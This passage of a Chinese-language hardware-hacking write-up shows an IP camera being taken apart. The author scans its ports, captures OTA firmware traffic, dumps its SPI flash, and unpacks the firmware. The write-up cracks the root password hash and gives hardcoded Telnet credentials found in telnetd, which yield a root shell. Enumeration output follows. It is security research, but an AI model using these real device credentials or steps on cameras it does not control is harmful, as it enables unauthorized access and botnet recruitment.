https://nmap.org/cgi-bin/submit.cgi?new-service :</span><br><span class="line">SF-Port554-TCP:V=7.40%I=7%D=1/4%Time=5A4E4B5D%P=arm-unknown-linux-gnueabih</span><br><span class="line">SF:f%r(SIPOptions,57,<span class="string">"RTSP/1\.0\x20401\x20Unauthorized\r\nCSeq:\x2042\r\nW</span></span><br><span class="line"><span class="string">SF:WW-Authenticate:\x20Basic\x20realm=\"MediaServer3\.0\"\r\n\r\n"</span>);</span><br><span class="line">MAC Address: E0:50:8B:35:74:02 (Zhejiang Dahua Technology)</span><br><span class="line">Device <span class="built_in">type</span>: general purpose</span><br><span class="line">Running: Linux 2.6.X|3.X</span><br><span class="line">OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3</span><br><span class="line">OS details: Linux 2.6.32 - 3.5</span><br><span class="line">Network Distance: 1 hop</span><br><span class="line"></span><br><span class="line">TRACEROUTE</span><br><span class="line">HOP RTT ADDRESS</span><br><span class="line">1 8.00 ms 192.168.8.236</span><br><span class="line"></span><br><span class="line">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line"><span class="comment"># Nmap done at Thu Jan 4 23:42:28 2018 -- 1 IP address (1 host up) scanned in 116.06 seconds</span></span><br></pre></td></tr></table></figure><p>扫描完成后看到设备上开放着 <code>23</code> <code>544</code> <code>5000</code> 3 个端口分别运行着 Telnet, RTSP, UPNP(疑似) 服务。</p><h3 id="3-2-网络数据包分析"><a href="#3-2-网络数据包分析" class="headerlink" title="3.2 网络数据包分析"></a>3.2 网络数据包分析</h3><p>这里使用安装了 <code>tcpdump</code> 且支持外接 USB 存储的 OpenWrt 路由器设备进行抓包。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ mount /dev/sdb1 /mnt/usb/ // 挂载 U盘</span><br><span class="line">$ <span class="built_in">cd</span> /mnt/usb/pcap/ // 进入 U盘挂载目录</span><br><span class="line">$ tcpdump -i wlan0-1 -w wlan0-1_$(date +%s).<span class="built_in">cap</span> // 抓取无线网卡上的数据流量</span><br></pre></td></tr></table></figure><p>抓取一段时间的数据包后使用 Wireshark 打开 <code>.pcap</code> 文件,分析 IPCamera 的数据通信流量。</p><p><img src="//files.iternull.com/images/2017-12-26_01-0004.png" alt=""></p><h2 id="4-固件提取"><a href="#4-固件提取" class="headerlink" title="4 固件提取"></a>4 固件提取</h2><h3 id="4-1-从-SPI-Flash-芯片里提取固件"><a href="#4-1-从-SPI-Flash-芯片里提取固件" class="headerlink" title="4.1 从 SPI Flash 芯片里提取固件"></a>4.1 从 SPI Flash 芯片里提取固件</h3><p>我们这里使用 Bus Pirate + 转接座 + SOP8 测试夹 工具来连接 SPI Flash 芯片提取固件。</p><p><img src="//files.iternull.com/images/2017-12-26_01-0005.jpg" alt=""></p><p>读取 SPI Flash 芯片内的数据到文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ flashrom -p buspirate_spi:dev=/dev/ttyUSB0,spispeed=1M -r flash_0.bin</span><br></pre></td></tr></table></figure><h3 id="4-2-从空气中提取固件"><a href="#4-2-从空气中提取固件" class="headerlink" title="4.2 从空气中提取固件"></a>4.2 从空气中提取固件</h3><p><strong>从空气中提取固件</strong> 在物联网时代里 OTA 固件升级模式下获得厂商原始升级固件的最佳方法!</p><p><a href="https://zh.wikipedia.org/wiki/%E7%A9%BA%E4%B8%AD%E7%BC%96%E7%A8%8B" target="_blank" rel="noopener">OTA</a>(Over-the-air) 从空中更新固件;从空气中提取固件其实就是从网络中提取固件,把更新固件时传输的所有数据包都抓取下来再重新把数据包组合起来还原固件的原始文件。这需要设备固件支持 OTA更新 才行,不过目前大多数厂商的 IoT 设备默认都有支持。</p><p>我们使用的这款型号的设备正好有推送新的固件更新,所以可以使用此方法获得固件。</p><p>这里使用安装了 <code>tcpdump</code> 且支持外接 USB 存储的 OpenWrt 路由器设备进行抓包。被抓包的设备必须连接到这路由器的 SSID 下。</p><p>抓取无线网卡上的数据流量</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ tcpdump -i wlan0-1 -w wlan0-1_$(date +%s).<span class="built_in">cap</span></span><br></pre></td></tr></table></figure><p>开始抓取流量后在 APP 控制端上点击对设备固件升级(更新前最好是对 SPI Flash 先备份,以保留旧版本的固件。)</p><p><img src="//files.iternull.com/images/2017-12-26_01-0006.png" alt=""></p><p>把抓取的数据包中的数据流保存到文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ tcpflow -r wlan0-1_1515316239.cap</span><br></pre></td></tr></table></figure><p><img src="//files.iternull.com/images/2017-12-26_01-0007.png" alt=""></p><p>查看未知格式的的数据文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ file * | grep data</span><br></pre></td></tr></table></figure><p><img src="//files.iternull.com/images/2017-12-26_01-0008.png" alt=""></p><p>递归扫描并提取出其中已知格式的文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ binwalk -Me 211.140.013.023.15050-172.016.042.116.42004</span><br></pre></td></tr></table></figure><p><img src="//files.iternull.com/images/2017-12-26_01-0009.png" alt=""></p><p>递归扫描并提取出的已知格式的文件</p><p><img src="//files.iternull.com/images/2017-12-26_01-0010.png" alt=""></p><h2 id="5-固件逆向"><a href="#5-固件逆向" class="headerlink" title="5 固件逆向"></a>5 固件逆向</h2><h3 id="5-1-解包固件"><a href="#5-1-解包固件" class="headerlink" title="5.1 解包固件"></a>5.1 解包固件</h3><p>从备份的 SPI Flash 数据里递归扫描并提取出其中已知格式的文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ binwalk -Me flash_0.bin</span><br></pre></td></tr></table></figure><p>查看递归提取后的文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">cd</span> _flash_0.bin.extracted/</span><br><span class="line">$ tree -L 3</span><br><span class="line">$ ls -l squashfs-root*</span><br></pre></td></tr></table></figure><p><img src="//files.iternull.com/images/2017-12-26_01-0011.png" alt=""></p><p>查看 Linux 用户与密码</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">cd</span> squashfs-root/</span><br><span class="line">$ <span class="built_in">cd</span> etc/</span><br><span class="line">$ cat passwd</span><br><span class="line">root:<span class="variable">$1</span><span class="variable">$jSqQv</span>.uP<span class="variable">$jgz4lwEx2pnDh4QwXkh06</span>/:0:0:root:/:/bin/sh</span><br></pre></td></tr></table></figure><p>查看 <code>passwd</code> 文件,发现系统里只有一个 root 用户,加盐后的的密码 Hash ,登陆 shell 为 <code>/bin/sh</code>。 使用 <a href="http://www.openwall.com/john/" target="_blank" rel="noopener">John the Ripper</a> 对 Hash 进行解码成明文密码。</p><p>以下是解出的密码<br>User: <code>root</code><br>Password: <code>vizxv</code></p><p>尝试使用这个账号登陆 Telnet 但并未成功。</p><h3 id="5-2-分析-Telnet"><a href="#5-2-分析-Telnet" class="headerlink" title="5.2 分析 Telnet"></a>5.2 分析 Telnet</h3><p>既然尝试使用系统用户登陆失败了,那只能从 Telnet 服务程序入手,分析它的登陆验证方式,找到正确的用户和密码。</p><p>查找 Telnet 服务程序</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">cd</span> _flash_0.bin.extracted/squashfs-root/</span><br><span class="line">$ find ./ -name *telnet*</span><br><span class="line">./bin/telnet // Telnet 客户端</span><br><span class="line">./sbin/telnetd // Telnet 服务端</span><br></pre></td></tr></table></figure><p>使用 IDA Pro 对 <code>telnetd</code> 进行反汇编后发现 Telnet 的用户名和密码是硬编码在程序里的。</p><p><img src="//files.iternull.com/images/2017-12-26_01-0012.png" alt=""><br><img src="//files.iternull.com/images/2017-12-26_01-0013.png" alt=""></p><p><strong>Telnet 登陆账号</strong><br>User: <code>admin</code><br>Password: <code>7ujMko0admin</code></p><p>使用这个用户再次尝试登陆 Telnet </p><p><img src="//files.iternull.com/images/2017-12-26_01-0014.png" alt=""></p><blockquote><p><strong>成功了!!!</strong><br>这个我们已经获得了 Shell 与 root 权限</p></blockquote><h3 id="5-3-收集系统运行信息"><a href="#5-3-收集系统运行信息" class="headerlink" title="5.3 收集系统运行信息"></a>5.3 收集系统运行信息</h3><p>这里登陆到 Telnet 手动收集信息,相较于使用 <a href="https://github.com/craigz28/firmwalker" target="_blank" rel="noopener">Firewalker</a> 脚本工具收集固件解包后的信息,能收集到设备在运行状态下内存里的更多信息。</p><p>收集运行的进程信息</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">~ <span class="comment"># ps</span></span><br><span class="line">PID USER TIME COMMAND</span><br><span class="line"> 1 root 0:00 init</span><br><span class="line"> 2 root 0:00 [kthreadd]</span><br><span class="line"> 3 root 0:00 [ksoftirqd/0]</span><br><span class="line"> 4 root 0:00 [kworker/0:0]</span><br><span class="line"> 5 root 0:01 [kworker/u:0]</span><br><span class="line"> 6 root 0:06 [rcu_kthread]</span><br><span class="line"> 7 root 0:00 [khelper]</span><br><span class="line"> 8 root 0:00 [kworker/u:1]</span><br><span class="line"> 72 root 0:00 [sync_supers]</span><br><span class="line"> 74 root 0:00 [bdi-default]</span><br><span class="line"> 76 root 0:00 [kblockd]</span><br><span class="line"> 168 root 0:00 [kswapd0]</span><br><span class="line"> 217 root 0:00 [fsnotify_mark]</span><br><span class="line"> 224 root 0:00 [crypto]</span><br><span class="line"> 238 root 0:00 [mtdblock0]</span><br><span class="line"> 243 root 0:00 [mtdblock1]</span><br><span class="line"> 248 root 0:00 [mtdblock2]</span><br><span class="line"> 253 root 0:00 [mtdblock3]</span><br><span class="line"> 258 root 0:00 [mtdblock4]</span><br><span class="line"> 263 root 0:01 [mtdblock5]</span><br><span class="line"> 268 root 0:00 [mtdblock6]</span><br><span class="line"> 273 root 0:00 [mtdblock7]</span><br><span class="line"> 281 root 0:00 [kpsmoused]</span><br><span class="line"> 282 root 0:00 [kworker/0:1]</span><br><span class="line"> 324 root 0:00 [jffs2_gcd_mtd7]</span><br><span class="line"> 342 root 0:00 /sbin/telnetd</span><br><span class="line"> 397 root 0:00 [khubd]</span><br><span class="line"> 418 root 0:00 [OSA_416_1]</span><br><span class="line"> 478 root 0:00 [OSA_462_3]</span><br><span class="line"> 483 root 0:00 [OSA_462_4]</span><br><span class="line"> 502 root 0:00 syshelper elper 60</span><br><span class="line"> 526 root 0:00 [cfg80211]</span><br><span class="line"> 533 root 0:01 /usr/bin/wpa_supplicant -g/var/tmp/wpa_supplicant-global -P/var/tmp/eth2.pid</span><br><span class="line"> 543 root 0:00 [kworker/u:2]</span><br><span class="line"> 548 root 0:00 [flush-mtd-unmap]</span><br><span class="line"> 556 root 0:54 VideoDaemon AEWB</span><br><span class="line"> 557 root 0:00 /bin/sh /etc/init.d/appauto</span><br><span class="line"> 581 root 0:00 /bin/sh ./usr/etc/app.sh</span><br><span class="line"> 587 root 1:58 /usr/bin/sonia</span><br><span class="line"> 612 root 0:01 [RTW_CMD_THREAD]</span><br><span class="line"> 913 root 0:00 [kworker/u:3]</span><br><span class="line"> 1295 root 0:00 -sh</span><br><span class="line"> 1427 root 0:00 ps</span><br><span class="line">~ <span class="comment">#</span></span><br></pre></td></tr></table></figure><p>收集 Linux 版本信息</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/proc <span class="comment"># cat version</span></span><br><span class="line">Linux version 3.0.8 (@centos-68) (gcc version 4.4.1 (Hisilicon_v100(gcc4.4-290+uclibc_0.9.30.2+eabi+linuxpthread)) )</span><br><span class="line">/proc <span class="comment">#</span></span><br></pre></td></tr></table></figure><p>收集处理器信息</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">~ <span class="comment"># cd /proc/</span></span><br><span class="line">/proc <span class="comment"># cat cpuinfo</span></span><br><span class="line">Processor : ARM926EJ-S rev 5 (v5l)</span><br><span class="line">BogoMIPS : 218.72</span><br><span class="line">Features : swp half fastmult edsp java</span><br><span class="line">CPU implementer : 0x41</span><br><span class="line">CPU architecture: 5TEJ</span><br><span class="line">CPU variant : 0x0</span><br><span class="line">CPU part : 0x926</span><br><span class="line">CPU revision : 5</span><br><span class="line"></span><br><span class="line">Hardware : hi3518</span><br><span class="line">Revision : 0000</span><br><span class="line">Serial : 0000000000000000</span><br><span class="line">/proc <span class="comment">#</span></span><br></pre></td></tr></table></figure><p>收集内存信息</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">/proc <span class="comment"># cat meminfo</span></span><br><span class="line">MemTotal: 41604 kB</span><br><span class="line">MemFree: 1832 kB</span><br><span class="line">Buffers: 3948 kB</span><br><span class="line">Cached: 11636 kB</span><br><span class="line">SwapCached: 0 kB</span><br><span class="line">Active: 20528 kB</span><br><span class="line">Inactive: 7928 kB</span><br><span class="line">Active(anon): 12920 kB</span><br><span class="line">Inactive(anon): 296 kB</span><br><span class="line">Active(file): 7608 kB</span><br><span class="line">Inactive(file): 7632 kB</span><br><span class="line">Unevictable: 0 kB</span><br><span class="line">Mlocked: 0 kB</span><br><span class="line">SwapTotal: 0 kB</span><br><span class="line">SwapFree: 0 kB</span><br><span class="line">Dirty: 0 kB</span><br><span class="line">Writeback: 0 kB</span><br><span class="line">AnonPages: 12896 kB</span><br><span class="line">Mapped: 7156 kB</span><br><span class="line">Shmem: 344 kB</span><br><span class="line">Slab: 3356 kB</span><br><span class="line">SReclaimable: 868 kB</span><br><span class="line">SUnreclaim: 2488 kB</span><br><span class="line">KernelStack: 728 kB</span><br><span class="line">PageTables: 476 kB</span><br><span class="line">NFS_Unstable: 0 kB</span><br><span class="line">Bounce: 0 kB</span><br><span class="line">WritebackTmp: 0 kB</span><br><span class="line">CommitLimit: 20800 kB</span><br><span class="line">Committed_AS: 449116 kB</span><br><span class="line">VmallocTotal: 966656 kB</span><br><span class="line">VmallocUsed: 17412 kB</span><br><span class="line">VmallocChunk: 931184 kB</span><br><span class="line">/proc <span class="comment">#</span></span><br></pre></td></tr></table></figure><p>收集 TCP 连接信息</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">/proc <span class="comment"># cat /proc/net/tcp</span></span><br><span class="line"> sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode</span><br><span class="line"> 0: 00000000:1388 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 403 1 c2658460 300 0 0 2 -1</span><br><span class="line"> 1: 00000000:022A 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 513 1 c2659180 300 0 0 2 -1</span><br><span class="line"> 2: 00000000:9390 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 415 1 c26588c0 300 0 0 2 -1</span><br><span class="line"> 3: 00000000:9391 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 412 1 c2658d20 300 0 0 2 -1</span><br><span class="line"> 4: 00000000:0017 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 162 1 c2658000 300 0 0 2 -1</span><br><span class="line"> 5: EC08A8C0:0017 7E08A8C0:CFA9 01 00000002:00000000 01:0000001D 00000000 0 0 1444 4 c26595e0 31 4 25 10 9</span><br><span class="line"> 6: EC08A8C0:A135 120D8CD3:BF86 01 00001E8F:00000000 01:0000001D 00000000 0 0 1052 2 c2659ea0 31 4 0 18 7</span><br><span class="line"> 7: EC08A8C0:B352 160D8CD3:3572 01 00000000:00000000 00:00000000 00000000 0 0 1042 1 c2659a40 21 4 30 5 3</span><br><span class="line">/proc <span class="comment">#</span></span><br></pre></td></tr></table></figure><p><code>local_address</code> 与 <code>rem_address</code> 都是十六进制的表示方法,并且 IP 地址是倒过来的。<br><code>6B 02 A8 C0</code> 转换成石家庄为 <code>107 2 168 192</code> 转换正常的 IPv4 地址为 <code>192.168.2.107</code>。<br><code>0017</code> 为端口号也是使用十六进制表示的,转换成十进制是 <code>23</code>。<br>闲手动麻烦可以使用 <a href="https://gist.github.com/jkstill/5095725" target="_blank" rel="noopener">proc_net_tcp_decode</a> 这个脚本去转换。</p><p>收集 UDP 连接信息</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">/proc <span class="comment"># cat /proc/net/udp</span></span><br><span class="line"> sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode ref pointer drops</span><br><span class="line"> 146: 00000000:9392 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 416 2 c1dcf800 0</span><br><span class="line"> 146: 00000000:9392 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 413 2 c1dcf600 0</span><br><span class="line"> 178: EC08A8C0:93B2 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 1061 2 c0b16400 0</span><br><span class="line"> 178: FBFFFFEF:93B2 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 1060 2 c0b16000 0</span><br><span class="line"> 186: 00000000:13BA 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 382 2 c1dcf400 0</span><br><span class="line">/proc <span class="comment">#</span></span><br></pre></td></tr></table></figure><p>收集已安装的命令行工具</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">~ <span class="comment">#</span></span><br><span class="line">VideoDaemon cat dmesg grep ip logView netinit <span class="built_in">pwd</span> ssl/ top</span><br><span class="line">[ chgrp du halt ipaddr login netinit6 reboot <span class="built_in">stat</span> touch</span><br><span class="line">[[ chmod <span class="built_in">echo</span> head iplink ls netstat redirClient sync udhcpd</span><br><span class="line">aewDebug chown egrep hostapd iproute lsmod netwifi redir_stdio syshelper udpsvd</span><br><span class="line">appauto chroot env hush iprule mdev nice rm systools umount</span><br><span class="line">armbenv clearparam fdisk hwclock iptunnel mkdir nslookup rmdir tail uname</span><br><span class="line">arp cp fgrep ifconfig iwconfig mknod ping rmmod tcpsvd unlzma</span><br><span class="line">arping cut find ifenslave <span class="built_in">kill</span> mnt_jffs2 ping6 route telnet unzip</span><br><span class="line">ash date free ii killall modinfo pkill sed telnetd vi</span><br><span class="line">audioDebug dd fsync inetd killall5 more poweroff seq <span class="built_in">test</span> who</span><br><span class="line">bash df gethwid init less mount printenv sh tftp whoami</span><br><span class="line">busybox dh_keyboard getty insmod ln mv ps sonia tftpd wpa_supplicant</span><br><span class="line">~ <span class="comment">#</span></span><br></pre></td></tr></table></figure><p>收集目录信息</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line">~ <span class="comment"># mount</span></span><br><span class="line">rootfs on / <span class="built_in">type</span> rootfs (rw)</span><br><span class="line">/dev/root on / <span class="built_in">type</span> squashfs (ro,relatime)</span><br><span class="line">devtmpfs on /dev <span class="built_in">type</span> devtmpfs (rw,relatime,size=20760k,nr_inodes=5190,mode=755)</span><br><span class="line">proc on /proc <span class="built_in">type</span> proc (rw,relatime)</span><br><span class="line">sysfs on /sys <span class="built_in">type</span> sysfs (rw,relatime)</span><br><span class="line">devpts on /dev/pts <span class="built_in">type</span> devpts (rw,relatime,mode=600,ptmxmode=000)</span><br><span class="line">tmpfs on /var <span class="built_in">type</span> tmpfs (rw,relatime)</span><br><span class="line">/dev/mtdblock5 on /usr <span class="built_in">type</span> squashfs (ro,relatime)</span><br><span class="line">/dev/mtdblock7 on /mnt/mtd <span class="built_in">type</span> jffs2 (rw,relatime)</span><br><span class="line">usbfs on /proc/bus/usb <span class="built_in">type</span> usbfs (rw,relatime)</span><br><span class="line">~ <span class="comment">#</span></span><br><span class="line">~ <span class="comment"># pwd</span></span><br><span class="line">/</span><br><span class="line">~ <span class="comment">#</span></span><br><span class="line">~ <span class="comment"># touch aaa</span></span><br><span class="line">touch: aaa: Read-only file system</span><br><span class="line">~ <span class="comment">#</span></span><br><span class="line">~ <span class="comment"># mount | grep rw</span></span><br><span class="line">rootfs on / <span class="built_in">type</span> rootfs (rw)</span><br><span class="line">devtmpfs on /dev <span class="built_in">type</span> devtmpfs (rw,relatime,size=20760k,nr_inodes=5190,mode=755)</span><br><span class="line">proc on /proc <span class="built_in">type</span> proc (rw,relatime)</span><br><span class="line">sysfs on /sys <span class="built_in">type</span> sysfs (rw,relatime)</span><br><span class="line">devpts on /dev/pts <span class="built_in">type</span> devpts (rw,relatime,mode=600,ptmxmode=000)</span><br><span class="line">tmpfs on /var <span class="built_in">type</span> tmpfs (rw,relatime)</span><br><span class="line">/dev/mtdblock7 on /mnt/mtd <span class="built_in">type</span> jffs2 (rw,relatime)</span><br><span class="line">usbfs on /proc/bus/usb <span class="built_in">type</span> usbfs (rw,relatime)</span><br><span class="line">~ <span class="comment">#</span></span><br><span class="line">~ <span class="comment"># cd /var/</span></span><br><span class="line">/var <span class="comment"># touch aaa</span></span><br><span class="line">/var <span class="comment"># ls -l</span></span><br><span class="line">total 0</span><br><span class="line">-rw-r--r-- 1 root root 0 Jan 25 04:23 aaa</span><br><span class="line">drwxr-xr-x 10 root root 440 Jan 25 04:02 tmp</span><br><span class="line">p-wx------ 1 root root 0 Jan 25 04:00 videoDebug</span><br><span class="line">drwxr-xr-x 2 root root 80 Jan 25 04:00 web</span><br><span class="line">/var <span class="comment">#</span></span><br><span class="line">/var <span class="comment"># cd /mnt/mtd/</span></span><br><span class="line">/mnt/mtd <span class="comment"># touch aaa</span></span><br><span class="line">/mnt/mtd <span class="comment"># ls -l</span></span><br><span class="line">total 6</span><br><span class="line">drwxr-xr-x 2 root root 0 Jan 1 1970 3A</span><br><span class="line">drwxr-xr-x 3 root root 0 Jan 25 04:00 Config</span><br><span class="line">drwxr-xr-x 2 root root 0 Nov 11 2016 Log</span><br><span class="line">-rw-r--r-- 1 root root 256 Jan 25 04:25 RtcSramFile</span><br><span class="line">-rw-r--r-- 1 root root 256 Jan 25 04:25 RtcSramFileBackUp</span><br><span class="line">-rw-r--r-- 1 root root 0 Jan 25 04:27 aaa</span><br><span class="line">drwxr-xr-x 2 root root 0 Jan 1 2000 audiofiles</span><br><span class="line">-rw-r--r-- 1 root root 36 Jan 25 04:00 flgFile</span><br><span class="line">-rw-r--r-- 1 root root 36 Jan 25 04:00 flgFileBackUp</span><br><span class="line">-rw-r--r-- 1 root root 556 Jan 25 04:15 recordSramFile</span><br><span class="line">-rw-r--r-- 1 root root 556 Jan 25 04:15 recordSramFileBackUp</span><br><span class="line">-rw-r--r-- 1 root root 256 Jan 25 04:25 socRtcSram</span><br><span class="line">-rw-r--r-- 1 root root 256 Jan 25 04:25 socRtcSramBackUp</span><br><span class="line">-rw-r--r-- 1 root root 21 Jan 1 2000 wifiModifyTime</span><br><span class="line">/mnt/mtd <span class="comment">#</span></span><br><span class="line"></span><br><span class="line">~ <span class="comment"># ls -l</span></span><br><span class="line">total 0</span><br><span class="line">drwxr-xr-x 2 root root 993 Jan 1 1970 bin</span><br><span class="line">drwxr-xr-x 7 root root 3200 Jan 25 04:00 dev</span><br><span class="line">drwxr-xr-x 4 root root 258 Jan 1 1970 etc</span><br><span class="line">drwxr-xr-x 2 root root 3 Jan 1 1970 home</span><br><span class="line">drwxr-xr-x 2 root root 534 Jan 1 1970 lib</span><br><span class="line">lrwxrwxrwx 1 root root 11 Jan 1 1970 linuxrc -> bin/busybox</span><br><span class="line">drwxr-xr-x 12 root root 170 Jan 1 1970 mnt</span><br><span class="line">drwxr-xr-x 2 root root 3 Jan 1 1970 nfs</span><br><span class="line">dr-xr-xr-x 57 root root 0 Jan 1 1970 proc</span><br><span class="line">drwxr-xr-x 2 root root 3 Jan 1 1970 root</span><br><span class="line">drwxr-xr-x 2 root root 423 Jan 1 1970 sbin</span><br><span class="line">drwxr-xr-x 2 root root 3 Jan 1 1970 share</span><br><span class="line">drwxr-xr-x 2 root root 3 Jan 1 1970 slave</span><br><span class="line">drwxr-xr-x 11 root root 0 Jan 1 1970 sys</span><br><span class="line">lrwxrwxrwx 1 root root 8 Jan 1 1970 tmp -> var/tmp/</span><br><span class="line">drwx--x--x 9 25858 25858 96 Oct 14 2015 usr</span><br><span class="line">drwxrwxrwt 4 root root 100 Jan 25 04:00 var</span><br><span class="line">~ <span class="comment">#</span></span><br></pre></td></tr></table></figure><p>收集网卡信息</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 